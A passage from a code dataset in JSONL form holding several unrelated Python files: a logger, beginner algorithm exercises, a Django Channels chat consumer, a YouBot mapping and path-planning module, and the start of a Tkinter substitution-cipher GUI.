Path.mkdir(Path(FOLDER), exist_ok=True)\n logname = f'logs/log_{datetime.now().strftime(\"%d,%m,%Y_%H;%M;%S\")}.txt'\n handler = logging.FileHandler(logname, mode='w')\n handler.setFormatter(logging.Formatter(_log_format))\n logger.addHandler(handler)\n return logger\n\nlogger = setup_logger(logging.DEBUG)\n\n\ndef cleanup_old_logs(dir=None):\n folder = dir or Path(FOLDER)\n if not Path.exists(folder):\n return\n for log in Path.iterdir(folder):\n if time() - log.stat().st_mtime > timedelta(days=30).total_seconds():\n os.remove(log)\n\n","repo_name":"godlike375/VolumeCalculator3D","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73319561124","text":"class BinaryTreeNode:\n def __init__(self,data):\n self.data=data\n self.left=None\n self.right=None\n\ndef height(root):\n if root is None:\n return 0\n leftNode=height(root.left)\n rightNode=height(root.right)\n return 1+max(leftNode,rightNode)\n\n\ndef inputTree():\n data=int(input())\n if data is -1:\n return\n root=BinaryTreeNode(data)\n root.left=inputTree()\n root.right=inputTree()\n return root\n\ndef preOrder(root):\n if root is None:\n return\n print(root.data,end=\":\")\n if root.left is not None:\n print(root.left.data,end=\",\")\n if root.right is not None:\n print(root.right.data,end=\"\")\n print()\n preOrder(root.left)\n preOrder(root.right)\nprint(height(inputTree()))\n#preOrder(inputTree())\n\n\n","repo_name":"Svastikkka/DS-AND-ALGO","sub_path":"Binary Tree/Height Of Tree.py","file_name":"Height Of Tree.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13712569414","text":"def symmetric(sqmat):\n size = len(sqmat)\n for i in range(size):\n for j in range(size):\n if (i != j and sqmat[i][j] != sqmat[j][i]):\n return False\n return True\n\n\nprint(symmetric([[2,3],[3,2]])) # True\nprint(symmetric([[2,3],[2,3]])) # False\nprint(symmetric([[1,7,3],[7,4,-5],[3,-5,6]])) # True\nprint(symmetric([[1,1,1,1],[1,1,1,1],[1,1,1,1],[1,1,1,1]])) # True\nprint(symmetric([[1,2,3,4],[2,1,4,3],[3,4,1,2],[4,3,2,1]])) # True\n\n##### 1. 9's complement\n# The number obtained by replacing each digit of a number with its difference from 9 is called the 9's complement.\n# Write a function that takes an integer and computes its 9's complement.\n# Assume the argument n is a natural number\ndef complement9(n):\n s = str(n)\n ans = \"\"\n for c in s:\n d = 9 - int(c)\n ans = ans + str(d)\n return int(ans)\n\n# print(0,\">>\",complement9(0)) # 9\n# print(9,\">>\",complement9(9)) # 0\n# print(4,\">>\",complement9(4)) # 5\n# print(18,\">>\",complement9(18)) # 81\n# print(40,\">>\",complement9(40)) # 59\n# print(307,\">>\",complement9(307)) # 692\n# print(9999,\">>\",complement9(9999)) # 0\n# print(9142,\">>\",complement9(9142)) # 857\n# print(9965,\">>\",complement9(9965)) # 34\n\n##### 2. 
Search\n# Takes an element key and a list xs of elements as arguments and\n# returns the index at which key first appears in xs\n# Returns -1 if key is not in xs\ndef search1st(key,ns) :\n index = 0\n for n in ns :\n if key == n :\n break\n else :\n index += 1\n if index == len(ns) :\n return -1\n else :\n return index\n\n# print(search1st(3,[])) # -1\n# print(search1st(3,[4,6,3,3,3])) # 2\n# print(search1st(3,[3,3,3,3,3])) # 0\n# print(search1st(3,[4,2,7,6,5])) # -1\n\n# Write a function that takes an element key and a list xs of elements as\n# arguments and returns the list of all indexes at which key occurs in xs.\ndef searchAll(key,ns) :\n index = 0\n indexes = []\n for n in ns :\n if key == n :\n indexes += [index]\n index += 1\n return indexes\n\n# print(searchAll(3,[])) # []\n# print(searchAll(3,[4,6,3,3,3])) # [2,3,4]\n# print(searchAll(3,[3,3,3,3,3])) # [0,1,2,3,4]\n# print(searchAll(3,[4,2,7,6,5])) # []\n\n\n##### 3~4. Counting up\n\ndef countUpTo(n):\n if n < 0:\n return []\n else:\n return countUpTo(n-1) + [n]\n\ndef countUpTo(n):\n def loop(n,ns):\n if n < 0:\n return ns\n else:\n return loop(n-1,[n]+ns)\n return loop(n,[])\n\ndef countUpTo(n):\n ns = []\n while n >= 0:\n ns = [n] + ns\n n -= 1\n return ns\n\ndef countUpTo(n):\n ns = []\n for i in range(n+1):\n ns.append(i)\n return ns\n\n# print(countUpTo(0)) # [0]\n# print(countUpTo(5)) # [0, 1, 2, 3, 4, 5]\n# print(countUpTo(-3)) # []\n\n\n##### 5~6. Adding lists element-wise\n##### Understand this, then rewrite it as tail-recursive and while-loop versions\ndef zippo(xs,ys):\n if xs == [] or ys == []:\n return xs + ys\n else:\n return [xs[0]+ys[0]] + zippo(xs[1:],ys[1:])\n\ndef zippo(xs,ys):\n def loop(xs,ys,zs):\n if xs == [] or ys == []:\n return zs + xs + ys\n else:\n return loop(xs[1:],ys[1:],zs+[xs[0]+ys[0]])\n return loop(xs,ys,[])\n\ndef zippo(xs,ys):\n zs = []\n while not (xs == [] or ys == []):\n zs = zs + [xs[0]+ys[0]]\n xs, ys = xs[1:], ys[1:]\n return zs + xs + ys\n\n# print(zippo([],[]))\n# print(zippo([2,7,4],[7,2,5]))\n# print(zippo([2,7,4],[7,2,5,9,9]))\n# print(zippo([2,7,4,9,9],[7,2,5]))\n\n##### 7. Blast\n# Write a function, using nested for loops, that takes a list of integers and\n# returns each integer repeated as many times as its value, all concatenated.\n\ndef blast(ns):\n bs = []\n for n in ns:\n ns = []\n for _ in range(n):\n ns.append(n)\n bs += ns\n return bs\n\n# print(blast([]))\n# print(blast([1,2,4]))\n# print(blast([3,4,5,1,2,4]))\n# print(blast([2,-3,3]))\n\n##### 8~10. Sets\ndef makeset(xs):\n ys = []\n for x in xs:\n if x not in ys:\n ys.append(x)\n return ys\n\ndef union(xs,ys):\n zs = []\n for x in xs:\n if x not in ys:\n zs.append(x)\n return zs+ys\n\ndef diff(xs,ys):\n zs = []\n for x in xs:\n if x not in ys:\n zs.append(x)\n return zs\n\ndef intersect(xs,ys):\n zs = []\n for x in xs:\n if x in ys:\n zs.append(x)\n return zs\n\n# ## Test\n# import random\n# s1 = makeset([random.randrange(10) for _ in range(10)])\n# print(s1)\n# s2 = makeset([random.randrange(10) for _ in range(10)])\n# print(s2)\n# print(union(s1,s2))\n# print(diff(s1,s2))\n# print(intersect(s1,s2))\n\n\n##### 11. Equivalent class\ndef equiv_class(ns):\n ns.sort()\n if ns == [] :\n return []\n else :\n top = ns[0]\n nss = [[top]]\n for n in ns[1:] :\n top = nss[-1][0]\n if n == top :\n tops = nss[-1]\n nss = nss[:-1]\n nss.append(tops+[n])\n else :\n nss.append([n])\n return nss\n\n# print(equiv_class([])) # []\n# print(equiv_class([3])) # [[3]]\n# print(equiv_class([4,3,2,4,4])) # [[2],[3],[4,4,4]]\n# print(equiv_class([2,4,4,2,2,3])) # [[2,2,2],[3],[4,4]]\n\n##### 12. 
Permutation\n# Write a function perm that takes a list of integers and produces\n# the list of all possible permutations of its elements.\ndef perm(xs):\n ps = [[]]\n for x in xs:\n ns = []\n for p in ps:\n ns.append(p+[x])\n ps += ns\n return ps\n\n# print(perm([])) # [[]]\n# print(perm([1])) # [[],[1]]\n# print(perm([1,2])) # [[],[1],[2],[1,2]]\n# print(perm([1,2,3])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3]]\n# print(perm([1,2,3,4])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3], [4], [1, 4], [2, 4], [1, 2, 4], [3, 4], [1, 3, 4], [2, 3, 4], [1, 2, 3, 4]]","repo_name":"SeungHune/Programming-Basic","sub_path":"2018_mid/2018_fin_1.py","file_name":"2018_fin_1.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10684928856","text":"from django.contrib.auth import get_user_model\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nimport json\nfrom chat.views import get_user_contact, get_current_chat, get_chats\nfrom django.core import serializers\nfrom UserProfile.models import UserProfile\nfrom chat.models import Message, Chat\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nimport channels.layers\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\n\n\nUser = get_user_model()\n\nclass ChatListConsumer(WebsocketConsumer):\n\n def fetch_chats(self, data):\n chats = get_chats(data['username'], data['chatIndex'])\n content = {\n 'command': 'chats',\n 'chats': self.chats_to_json(chats, data),\n }\n self.send_chats(content)\n\n def fetch_more_chats(self, data):\n chats = get_chats(data['username'], data['chatIndex'])\n\n content = {\n 'command': 'more_chats',\n 'chats': self.chats_to_json(chats, data)\n }\n self.send_chats(content)\n\n def chats_to_json(self, chats, data):\n result = []\n for chat in chats:\n result.append(self.chat_to_json(chat, data))\n return result\n\n def chat_to_json(self, chat, data):\n participants = chat.participants.all()\n participants_list = []\n user = ''\n for participant in participants:\n if participant.username != data['username']:\n user = participant\n participants_list.append(participant.username)\n contact = get_user_contact(user)\n user_profile = UserProfile.objects.get(user=contact)\n user_image = None\n if user_profile.image:\n user_image = user_profile.image.url\n\n last_message = chat.messages.last().content\n\n current_user = get_user_contact(data['username'])\n visited = current_user in chat.visited.all()\n\n return {\n 'id': chat.id,\n 'username': participants_list,\n 'last_message': last_message,\n 'visited': visited,\n 'user_image': user_image,\n 'updated_at': str(chat.updated_at),\n }\n\n commands = {\n 'fetch_chats': fetch_chats,\n 'fetch_more_chats': fetch_more_chats,\n }\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chatList_%s' % self.room_name\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n self.accept()\n\n def disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n def receive(self, text_data):\n data = json.loads(text_data)\n self.commands[data['command']](self, data)\n\n # def send_chat(self, chat):\n # async_to_sync(self.channel_layer.group_send)(\n # self.room_group_name,\n # {\n # 'type': 'chat',\n # 'chat': chat\n # }\n # )\n\n def send_chats(self, chats):\n 
self.send(text_data=json.dumps(chats))\n\n # def chat(self, event):\n # chat = event['chat']\n # self.send(text_data=json.dumps(chat))","repo_name":"neerraghuwanshi/django-some","sub_path":"chat/chatListConsumers.py","file_name":"chatListConsumers.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36553216930","text":"\"\"\"\r\n University of Liege\r\n INFO0948-2 - Introduction to intelligent robotics\r\n Authors : \r\n BOVEROUX Laurie\r\n DELCOUR Florian\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom robopy.base.transforms import transl, trotx, troty, trotz\r\nfrom youbot_hokuyo import youbot_hokuyo\r\nfrom matplotlib import path\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\nfrom astar import *\r\nfrom skimage import color\r\nfrom skimage.transform import hough_circle, hough_circle_peaks\r\nfrom skimage.feature import canny\r\nfrom skimage.draw import circle_perimeter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nclass Map:\r\n\r\n def __init__(self, height, width, resolution,numTables,radiusTables):\r\n \r\n ####################################\r\n # variables for navigation #\r\n ####################################\r\n\r\n # map parameters\r\n self.height = height\r\n self.width = width\r\n self.resolution = resolution\r\n self.matHeight = 2*self.height*self.resolution\r\n self.matWidth = 2*self.width*self.resolution\r\n self.map = np.zeros((self.matHeight, self.matWidth))\r\n \r\n # scanned points from hokuyo sensors\r\n self.hokuyoPt = 0\r\n\r\n # contact points from hokuyo sensors\r\n self.hokuyoContacts = 0\r\n\r\n # previous goal point\r\n self.prevGoal = []\r\n\r\n\r\n ####################################\r\n # variables for manipulation #\r\n ####################################\r\n \r\n self.numTables = numTables\r\n self.radiusTables = radiusTables\r\n self.tableCenter = {'easy': [None, None], 'hard': [None, None], 'target' : [None, None]}\r\n self.tableCenterScene = {'easy' : [-5.575,2.925], 'hard' : [-5.55,5.2], 'target' : [None,None]}\r\n\r\n # x and y coordinates of the tables perimeter\r\n self.perimTabx = []\r\n self.perimTaby = []\r\n\r\n # copy of the map without tables as obstacles\r\n self.mapWithoutTables = np.zeros((self.matHeight, self.matWidth))\r\n\r\n # extended grids obstacles\r\n self.gridExtend1 = None\r\n self.gridExtend2 = None\r\n\r\n # coordinates around target table\r\n self.posAroundTarget = []\r\n\r\n\r\n def updateDataHokuyo(self, robot):\r\n \"\"\"Update the map with the data from the hokuyo sensors\"\"\"\r\n\r\n # transformation to robot position in the meshgrid\r\n youbotPosMap = robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0])\r\n trf = transl(youbotPosMap[0],youbotPosMap[1],youbotPosMap[2]) * trotx(robot.youbotEuler[0]) * troty(robot.youbotEuler[1]) * trotz(robot.youbotEuler[2])\r\n\r\n # get data from the hokuyo - return empty if data is not captured\r\n scanned_points, contacts = youbot_hokuyo(robot.vrep, robot.h, robot.vrep.simx_opmode_buffer,trans = trf)\r\n\r\n # coordinates of the sensors\r\n tmph1 = trf * np.array([[robot.h['hokuyo1Pos'][0],robot.h['hokuyo1Pos'][1],robot.h['hokuyo1Pos'][2],1]]).T\r\n coordH1 = np.array([tmph1[0][0],tmph1[1][0]],dtype=object)\r\n \r\n tmph2 = trf * np.array([[robot.h['hokuyo2Pos'][0],robot.h['hokuyo2Pos'][1],robot.h['hokuyo2Pos'][2],1]]).T\r\n coordH2 = np.array([tmph2[0][0],tmph2[1][0]],dtype=object)\r\n\r\n 
all_X_scanned_points = np.concatenate((scanned_points[0,:],scanned_points[3,:]), axis=1)\r\n all_X = np.insert(all_X_scanned_points,0,coordH1[0],axis=1)\r\n all_X = np.insert(all_X,len(all_X),coordH2[0],axis=1)\r\n\r\n all_Y_scanned_points = np.concatenate((scanned_points[1,:],scanned_points[4,:]), axis=1)\r\n all_Y = np.insert(all_Y_scanned_points,0,coordH1[1],axis=1)\r\n all_Y = np.insert(all_Y,len(all_Y),coordH2[1],axis=1)\r\n\r\n self.hokuyoPt = np.stack((all_X_scanned_points, all_Y_scanned_points), axis=0)\r\n\r\n # create the test meshgrid\r\n xMax = np.max(all_X)\r\n xMin = np.min(all_X)\r\n yMax = np.max(all_Y)\r\n yMin = np.min(all_Y)\r\n a = np.arange(xMin,xMax,1/self.resolution)\r\n b = np.arange(yMin,yMax,1/self.resolution)\r\n mx, my = np.meshgrid(a,b)\r\n catalog_test_points = np.stack((mx.flatten(),my.flatten()),axis=1) \r\n\r\n # create the polygon\r\n points = np.transpose(np.stack((all_X, all_Y),axis=0))\r\n poly = path.Path(points)\r\n\r\n pointsRes = poly.contains_points(catalog_test_points)\r\n \r\n # Update map with point in polygon\r\n # point = free -> -1\r\n # point = obstacle -> +10\r\n # point = unobserved -> 0\r\n\r\n # If points in the polygon, there in no obstacle \r\n indMinus = np.where(pointsRes)\r\n self.map[(np.round((catalog_test_points[indMinus,0])*self.resolution)).astype(int), (np.round((catalog_test_points[indMinus,1])*self.resolution)).astype(int)] -=1\r\n\r\n # Update the map in function of the points from the hokuyo sensors\r\n all_contacts = np.concatenate((contacts[0,:],contacts[1,:]), axis=0)\r\n self.hokuyoContacts = all_contacts\r\n\r\n indPlus = np.where(all_contacts) #obstacle\r\n indMinus = np.where(all_contacts == False) #free\r\n self.map[(np.round((all_X_scanned_points[0,indPlus])*self.resolution)).astype(int), (np.round((all_Y_scanned_points[0,indPlus])*self.resolution)).astype(int)] += 10\r\n self.map[(np.round((all_X_scanned_points[0,indMinus])*self.resolution)).astype(int), (np.round((all_Y_scanned_points[0,indMinus])*self.resolution)).astype(int)] -= 1\r\n\r\n\r\n def show(self, *args):\r\n \"\"\"Display the map along with robot pos and trajectory\"\"\"\r\n \r\n mapCopie = np.copy(self.map)\r\n indNeg = np.where(mapCopie[:,:] < 0)\r\n mapCopie[indNeg] = -1\r\n indPos = np.where(mapCopie[:,:] > 0)\r\n mapCopie[indPos] = 1\r\n vec_col = ListedColormap([\"darkslateblue\", \"lightblue\", \"yellow\"])\r\n\r\n if len(args) == 0:\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=False)\r\n plt.pause(0.05)\r\n plt.savefig(\"mapExplored.pdf\")\r\n\r\n if len(args) == 2:\r\n if(not len(args[0])):\r\n return\r\n plt.clf()\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n for point in args[0]:\r\n plt.scatter(point[1], point[0], c='red')\r\n robot = args[1]\r\n youbotPosMap = (robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0]))[:2] * self.resolution\r\n plt.scatter(round(youbotPosMap[1]), round(youbotPosMap[0]), c='black')\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=False)\r\n plt.pause(0.05)\r\n\r\n if len(args) == 1:\r\n plt.clf()\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n for i in range(self.numTables):\r\n for point in zip(self.perimTabx[i], self.perimTaby[i]):\r\n plt.scatter(point[1], point[0], 5, c='red')\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=True)\r\n plt.pause(0.05)\r\n\r\n\r\n def getNextPath(self, robot, fromPt):\r\n \"\"\"Return 
the next path to follow using astar algorithm\"\"\"\r\n\r\n while True:\r\n\r\n youbotPosMap = (np.round((robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0])) * self.resolution)).astype(int)\r\n fromPt = fromPt * self.resolution\r\n gp = self.getNextPoint(youbotPosMap)\r\n\r\n if gp[0] == np.inf:\r\n print('ERROR : no goal point')\r\n return [[np.inf,np.inf]]\r\n \r\n sp = youbotPosMap[:2]\r\n path = astar(sp[0], sp[1], gp[0], gp[1], self.map)\r\n\r\n if len(path) == 0:\r\n self.prevGoal.append((gp[0], gp[1]))\r\n continue\r\n \r\n if len(path) >=3:\r\n path = self.optimizePath(path)\r\n \r\n self.prevGoal = []\r\n return path\r\n\r\n\r\n def optimizePath(self, path):\r\n \"\"\"Remove colinear points to optimize path\"\"\"\r\n\r\n newPath = [path[0]]\r\n \r\n p_1 = path[0]\r\n p_2 = path[1]\r\n p_3 = path[2]\r\n\r\n for i in range(2, len(path)):\r\n x1, y1 = p_1[0], p_1[1]\r\n x2, y2 = p_2[0], p_2[1]\r\n x3, y3 = p_3[0], p_3[1] \r\n\r\n if ((y3 - y2) * (x2 - x1) != (y2 - y1) * (x3 - x2)):\r\n newPath.append(p_2)\r\n\r\n p_1 = p_2\r\n p_2 = p_3\r\n p_3 = path[i]\r\n \r\n newPath.append(path[-1])\r\n return newPath\r\n \r\n\r\n def getNextPoint(self,youbotPosMap):\r\n \"\"\"\r\n Return the next point to go. It is the closest point greater than 0.5 meters to the robot.\r\n This point is a unobserved point next to one free point.\r\n \"\"\"\r\n\r\n maxDist = np.inf\r\n nextPt = np.array([np.inf,np.inf])\r\n grid = np.zeros((self.matHeight, self.matWidth)) \r\n ind = np.where(self.map[:,:] > 0)\r\n grid[ind] = 1\r\n\r\n # inflate obstacles of the grid\r\n struct2 = sp.generate_binary_structure(2, 2)\r\n grid = sp.binary_dilation(grid, structure=struct2, iterations = 2).astype(grid.dtype)\r\n ind = np.where((grid==0) & (self.map[:,:] < 0))\r\n \r\n for k in range(len(ind[0])):\r\n i = ind[0][k]\r\n j = ind[1][k]\r\n\r\n if (i,j) in self.prevGoal:\r\n continue\r\n\r\n # At least 1 free point around the next target point\r\n count = 0\r\n for x in [i-1, i, i+1]:\r\n for y in [j-1, j, j+1]:\r\n if x >= 0 and y >= 0 and x < self.matHeight and y < self.matWidth and not(x==i and y ==j):\r\n if self.map[x,y] == 0 : #There is a unexplored neighboor\r\n count += 1\r\n break\r\n \r\n if count >= 1:\r\n coordNextPt = np.array([i,j])\r\n dist = np.linalg.norm(youbotPosMap[:2] - coordNextPt)\r\n if dist < maxDist and dist > 5*self.resolution:\r\n maxDist = dist\r\n nextPt = coordNextPt\r\n\r\n return nextPt\r\n\r\n\r\n def tableCenterFinding(self,robot):\r\n \"\"\"\r\n Find the center of the target table. 
\r\n Generate some points around object table and target table\r\n \"\"\"\r\n \r\n # Coordinates of easy and hard table are known and fixed.\r\n self.tableCenter['easy'] = [round((-5.575 - robot.youbotPosInit[0] + 15)*self.resolution), round((2.925 - robot.youbotPosInit[1] + 15)*self.resolution)]\r\n self.tableCenter['hard'] = [round((-5.55 - robot.youbotPosInit[0] + 15)*self.resolution), round((5.2 - robot.youbotPosInit[1] + 15)*self.resolution)]\r\n\r\n mapCopy = self.map.copy()\r\n indOne = np.where(mapCopy > 0)\r\n indZero = np.where(mapCopy < 0)\r\n mapCopy[indOne] = 1\r\n mapCopy[indZero] = 0\r\n\r\n edges = canny(mapCopy)\r\n # detect two radii\r\n #hough_radii = np.array([round(self.radiusTables * self.resolution),round((self.radiusTables * self.resolution)+1)])\r\n hough_radii = np.array([round((self.radiusTables * self.resolution)+1)])\r\n hough_res = hough_circle(edges, hough_radii)\r\n \r\n # select the most prominent 3 circles\r\n _, cx, cy, radii = hough_circle_peaks(hough_res, hough_radii, total_num_peaks=self.numTables)\r\n \r\n # draw them\r\n image = color.gray2rgb(mapCopy)\r\n self.mapWithoutTables = self.map.copy()\r\n\r\n for center_y, center_x, radius in zip(cy, cx, radii):\r\n circy, circx = circle_perimeter(center_y, center_x, radius,shape=image.shape)\r\n self.perimTabx.append(circy)\r\n self.perimTaby.append(circx)\r\n\r\n xMax = np.max(circy)\r\n xMin = np.min(circy)\r\n yMax = np.max(circx)\r\n yMin = np.min(circx)\r\n self.mapWithoutTables[xMin:xMax+1, yMin:yMax+1] = -1\r\n\r\n self.show(True)\r\n\r\n tabInd = []\r\n for tab in ['easy', 'hard']:\r\n a = np.linalg.norm([self.tableCenter[tab][0]-cy[0], self.tableCenter[tab][1]-cx[0]])\r\n b = np.linalg.norm([self.tableCenter[tab][0]-cy[1], self.tableCenter[tab][1]-cx[1]])\r\n c = np.linalg.norm([self.tableCenter[tab][0]-cy[2], self.tableCenter[tab][1]-cx[2]])\r\n tabInd.append(np.argmin((a,b,c)))\r\n\r\n targetInd = (set(range(self.numTables))- set(tabInd)).pop()\r\n self.tableCenter['target'] = [cy[targetInd], cx[targetInd]]\r\n\r\n for j in range(self.perimTabx[targetInd].shape[0]):\r\n x = self.perimTabx[targetInd][j]\r\n y = self.perimTaby[targetInd][j]\r\n\r\n while self.gridExtend1[x,y] != 0:\r\n x, y = self.extendPointOutTable(cy[targetInd], cx[targetInd], x, y)\r\n x, y = self.extendPointOutTable(cy[targetInd], cx[targetInd], x, y)\r\n\r\n if [x, y] not in self.posAroundTarget:\r\n self.posAroundTarget.append([x,y])\r\n\r\n a = len(self.posAroundTarget)\r\n self.posAroundTarget = self.posAroundTarget[:int(a/3)]\r\n\r\n return\r\n \r\n\r\n def extendPointOutTable(self,cx,cy,x,y):\r\n \"\"\"Get next point out of the table\"\"\"\r\n if x > cx:\r\n if y > cy:\r\n return x+1, y+1\r\n elif y < cy:\r\n return x+1, y-1\r\n else:\r\n return x+1, y\r\n elif x < cx:\r\n if y > cy:\r\n return x-1, y+1\r\n elif y < cy:\r\n return x-1, y-1\r\n else:\r\n return x-1, y\r\n else:\r\n if y > cy:\r\n return x, y+1\r\n elif y < cy:\r\n return x, y-1\r\n else:\r\n return x, y\r\n\r\n\r\n def getPointNearObject(self,objTar,centerTab):\r\n \"\"\"Get nearest free point around the object\"\"\"\r\n\r\n # Extend the point out of the table\r\n cx = centerTab[0]\r\n cy = centerTab[1] \r\n ox = round(objTar[0])\r\n oy = round(objTar[1])\r\n\r\n align = np.inf\r\n\r\n for i in [-1, 0, 1]:\r\n for j in [-1, 0, 1]:\r\n if i == 0 and j == 0:\r\n continue\r\n newI = ox+i\r\n newJ = oy+j\r\n \r\n if np.linalg.norm([cx-newI, cy-newJ]) < self.radiusTables*self.resolution:\r\n continue\r\n\r\n a = ((cy - oy) * (ox-newI) - (oy-newJ) * (cx - 
ox))\r\n\r\n if abs(a) < align:\r\n align = abs(a)\r\n\r\n while self.gridExtend1[newI,newJ] != 0:\r\n newI += i\r\n newJ += j\r\n\r\n xObject = newI + i\r\n yObject = newJ + j\r\n \r\n mapCopie = np.copy(self.map)\r\n indNeg = np.where(mapCopie[:,:] < 0)\r\n mapCopie[indNeg] = -1\r\n indPos = np.where(mapCopie[:,:] > 0)\r\n mapCopie[indPos] = 1\r\n vec_col = ListedColormap([\"darkslateblue\", \"lightblue\", \"yellow\"])\r\n\r\n return [round(xObject), round(yObject)]\r\n\r\n\r\n def getPtAroundTableCenter(self, target, source):\r\n \"\"\"\r\n Get nearest point from robot around the table center\r\n 'target' : point to extend where we want to go (ex: center)\r\n 'source' : (ex : youBot)\r\n \"\"\"\r\n\r\n i = target[0]\r\n j = target[1]\r\n iMin = None\r\n jMin = None\r\n dist = np.inf\r\n\r\n for x in [i-4, i, i+4]:\r\n for y in [j-4, j, j+4]:\r\n if x >= 0 and y >= 0 and x < self.matHeight and y < self.matWidth and not(x==i and y==j):\r\n\r\n distCurr = np.linalg.norm([x-source[0], y-source[1]])\r\n\r\n if distCurr < dist and self.gridExtend2[x,y] != 1:\r\n iMin = x\r\n jMin = y\r\n dist = distCurr\r\n \r\n cx = target[0]\r\n cy = target[1] \r\n x = iMin\r\n y = jMin\r\n dist = np.linalg.norm([cx-x, cy-y])\r\n\r\n while(dist < (2*self.radiusTables*self.resolution)+1): \r\n x,y = self.extendPointOutTable(cx,cy,x,y)\r\n dist = np.linalg.norm([cx-x, cy-y])\r\n\r\n return [round(x),round(y)]\r\n\r\n\r\n","repo_name":"FlorianDelcour/Robotics","sub_path":"LazyBot/MapController.py","file_name":"MapController.py","file_ext":"py","file_size_in_byte":16502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71003287845","text":"\"\"\"\r\nDecriptor loko\r\n\"\"\"\r\n# -⁻- coding: UTF-8 -*-\r\nimport os\r\nfrom tkinter import *\r\n\r\nclass Decriptor:\r\n def __init__(self):\r\n self.rutaPY = str(os.path.dirname(os.path.abspath(__file__))) # En donde estoy padado\r\n self.pantalla = Tk()\r\n self.tela = Canvas(self.pantalla, width=900, height=720, bg=\"snow\")\r\n self.lblBarnner = Label(self.tela, text=\"Esto fue creado por el loco para decifrar .txt por sustitución\")\r\n self.lblNombreTxt = Label(self.tela, text=\"Ingrese el nombre del txt: \")\r\n self.txtNombreTXT = Entry(self.tela)\r\n self.btnCargarTexto = Button(self.tela, text=\"CargarTexto\", command=self.cargarTexto)\r\n self.btnInstrucciones = Button(self.tela, text=\"Instrucciones\", bg=\"green\", command=self.mostrarInstrucciones)\r\n self.btnActualizarTexto = Button(self.tela, text=\"Actualizar\", command=self.actualizartexto)\r\n self.txtTextoBruto = Text(self.tela, width=70)\r\n self.bannerPorcentaje = Label(self.tela, text=\"%De Coincidencia%\")\r\n self.lblRemplazar = Label(self.tela, text=\"Reemplzar A -> B : \")\r\n self.txtReemplazarA = Entry(self.tela, width=6)\r\n self.txtReemplazarB = Entry(self.tela, width=6)\r\n self.btnReemplazarAB = Button(self.tela, text=\"reemplazarAB\", command=self.reemplazarEnTextoAB)\r\n self.lblVerPalabrasSiElEspacioEs = Label(self.tela, text=\"Ver palabras si el espacio es: \")\r\n self.txtVerPalabrasSiElEspacioEs = Entry(self.tela, width=6)\r\n self.btnVerPalabrasSiElEspacioEs = Button(self.tela, text=\"Ver\", command=self.verPalabrasSiElEspacioEsA)\r\n self.lblVerCuantasVecesApareceUnPatron = Label(self.tela, text=\"Ver cuantas Veces Aparece el patrón: \")\r\n self.txtVerCuantasVecesApareceUnPatron = Entry(self.tela, width=6)\r\n self.btnVerCuantasVecesApareceUnPatron = Button(self.tela, text=\"Ver\", 
command=self.verCantidadDeCoindicenciasDePatron)\r\n\r\n\r\n \"\"\"Variables\"\"\"\r\n self.textoCargadoExitosamente = False\r\n self.textoEncriptado = \"\" # Aqui se guarda el texto original\r\n self.textoTemporal = \"\"\r\n\r\n self.pintarPantallaYMostrar()\r\n\r\n def pintarPantallaYMostrar(self):\r\n self.pantalla.title(\"DecriptorByFelipelosH\")\r\n self.pantalla.geometry(\"900x720\")\r\n\r\n self.tela.place(x=0, y=0)\r\n self.lblBarnner.place(x=280, y=10)\r\n self.lblNombreTxt.place(x=20, y=40)\r\n self.txtNombreTXT.place(x=200, y=40)\r\n self.btnCargarTexto.place(x=330, y=40)\r\n self.btnInstrucciones.place(x=800, y=20)\r\n self.bannerPorcentaje.place(x=600, y=80)\r\n self.txtTextoBruto.place(x=10, y=80)\r\n\r\n self.tela.create_line(10, 490, 890, 490)\r\n self.tela.create_line(10, 500, 890, 500)\r\n\r\n self.lblRemplazar.place(x=20, y=540)\r\n self.txtReemplazarA.place(x=140, y=542)\r\n self.txtReemplazarB.place(x=190, y=542)\r\n self.btnReemplazarAB.place(x=240, y=540)\r\n self.lblVerPalabrasSiElEspacioEs.place(x=20, y=590)\r\n self.txtVerPalabrasSiElEspacioEs.place(x=190, y=590)\r\n self.btnVerPalabrasSiElEspacioEs.place(x=240, y=588)\r\n self.lblVerCuantasVecesApareceUnPatron.place(x=20, y=630)\r\n self.txtVerCuantasVecesApareceUnPatron.place(x=240, y=630)\r\n self.btnVerCuantasVecesApareceUnPatron.place(x=300, y=628)\r\n\r\n \r\n\r\n\r\n 